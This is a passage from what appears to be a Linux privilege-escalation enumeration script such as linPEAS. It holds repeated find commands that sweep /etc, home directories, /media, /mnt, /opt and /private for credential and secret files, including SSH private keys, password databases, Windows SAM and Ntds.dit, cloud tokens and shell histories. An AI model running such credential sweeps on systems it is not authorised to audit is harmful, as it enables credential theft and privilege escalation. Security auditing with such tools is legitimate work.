\"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"*knockd*\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"ssh*config\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.service\" -o -name \"*.socket\" -o -name \"*.timer\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"*.gnupg\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"redis.conf\" -o -name \"sess_*\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name \"SAM\" -o -name \"ffftp.ini\" -o -name \"hostapd.conf\" -o -name \"kibana.y*ml\" -o -name \"protecteduserkey.bin\" -o -name \"appcmd.exe\" -o -name \"postgresql.conf\" -o -name \".htpasswd\" -o -name \"*.cer\" -o -name \"access.log\" -o -name \"creds*\" -o -name \"error.log\" -o -name \".plan\" -o -name \".gitconfig\" -o -name \"*password*\" -o -name \"setupinfo\" -o -name \"accessTokens.json\" -o -name \"*.csr\" -o -name \"secrets.yml\" -o -name \"unattend.txt\" -o -name \"authorized_hosts\" -o -name \".bashrc\" -o -name \"AzureRMContext.json\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"sitemanager.xml\" -o -name \"autologin.conf\" -o -name \"sites.ini\" -o -name \"RDCMan.settings\" -o -name \"backup\" -o -name \"*.service\" -o -name \"storage.php\" -o -name \"*.crt\" -o -name \"legacy_credentials.db\" -o -name \".pypirc\" -o -name \"tomcat-users.xml\" -o -name \"Ntds.dit\" -o -name \"krb5.conf\" -o -name \"*.sqlite\" -o -name \"*vnc*.ini\" -o -name \"wcx_ftp.ini\" -o -name \"default.sav\" -o -name \".git\" -o -name \"*.kdbx\" -o -name \"scclient.exe\" -o -name \"docker-compose.yml\" -o -name \"NetSetup.log\" -o -name \"server.xml\" -o -name \"gitlab.rm\" -o -name \".*_history.*\" -o -name \"rsyncd.secrets\" -o -name \".env\" -o -name \"*vnc*.txt\" -o -name \"vault-ssh-helper.hcl\" -o -name \"KeePass.config*\" -o -name \"*.db\" -o -name \"000-default.conf\" -o -name \"ipsec.conf\" -o -name \".google_authenticator\" -o -name \"system\" -o -name \"db.php\" -o -name \".recently-used.xbel\" -o -name \"unattend.xml\" -o -name \"system.sav\" -o -name \"snmpd.conf\" -o -name \"ntuser.dat\" -o -name \"sysprep.inf\" -o -name \"*credential*\" -o -name \"ipsec.secrets\" -o -name \"filezilla.xml\" -o -name \"hosts.equiv\" -o -name \"*.sqlite3\" -o -name \"my.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"rsyncd.conf\" -o -name \"credentials.db\" -o -name \"SYSTEM\" -o -name \"*.ovpn\" -o -name \"AppEvent.Evt\" -o -name \"software.sav\" -o -name \"https-xampp.conf\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"gitlab.yml\" -o -name \"ws_ftp.ini\" -o -name \"autologin\" -o -name \"ftp.config\" -o -name \"httpd.conf\" -o -name \".msmtprc\" -o -name \"recentservers.xml\" -o -name \"bash.exe\" -o -name \"*vnc*.c*nf*\" -o -name \"groups.xml\" -o -name \"access_tokens.db\" -o -name \".profile\" -o -name \"*.timer\" -o -name \"*.jks\" -o -name \"SecEvent.Evt\" -o -name \"Dockerfile\" -o -name \"ftp.ini\" -o -name \"winscp.ini\" -o -name \"cesi.conf\" -o -name \".k5login\" -o -name \"gvm-tools.conf\" -o -name \"scheduledtasks.xml\" -o -name \"pagefile.sys\" -o -name \".lesshst\" -o -name \"docker.sock\" -o -name \"*.socket\" -o -name \"KeePass.enforced*\" -o -name \"known_hosts\" -o -name \"drives.xml\" -o -name \".git-credentials\" -o -name \"index.dat\" -o -name \"TokenCache.dat\" -o -name \"supervisord.conf\" -o -name \"krb5.keytab\" -o -name \"web*.config\" -o -name \"datasources.xml\" -o -name \"*.key\" -o -name \".ldaprc\" -o -name \"https.conf\" -o -name \".vault-token\" -o -name \"*.swp\" -o -name \"ConsoleHost_history.txt\" -o -name \".erlang.cookie\" -o -name \"redis.conf\" -o -name \"id_dsa*\" -o -name \"pgsql.conf\" -o -name \"fastcgi_params\" -o -name \"wp-config.php\" -o -name \"*.keyring\" -o -name \"pg_hba.conf\" -o -name \"debian.cnf\" -o -name \"kadm5.acl\" -o -name \"wsl.exe\" -o -name \"credentials\" -o -name \"unattended.xml\" -o -name \"backups\" -o -name \"*.pfx\" -o -name \"authorized_keys\" -o -name \"access_tokens.json\" -o -name \"database.php\" -o -name \"*.pgp\" -o -name \"my.cnf\" -o -name \"*.ftpconfig\" -o -name \"*.gnupg\" -o -name \"php.ini\" -o -name \"*.gpg\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"mongod*.conf\" -o -name \"config.php\" -o -name \".github\" -o -name \"pgadmin*.db\" -o -name \"*vnc*.xml\" -o -name \"*.p12\" -o -name \"elasticsearch.y*ml\" -o -name \"FreeSSHDservice.ini\" -o -name \"software\" -o -name \"*.viminfo\" -o -name \"KeePass.ini\" -o -name \"printers.xml\" -o -name \".rhosts\" -o -name \"iis6.log\" -o -name \"docker.socket\" -o -name \"settings.php\" -o -name \"id_rsa*\" -o -name \"mosquitto.conf\" -o -name \"sysprep.xml\" -o -name \"ddclient.conf\" -o -name \"passwd\" -o -name \"security.sav\" -o -name \"setupinfo.bak\" -o -name \"azureProfile.json\" -o -name \"*.keystore\" -o -name \"*.der\" -o -name 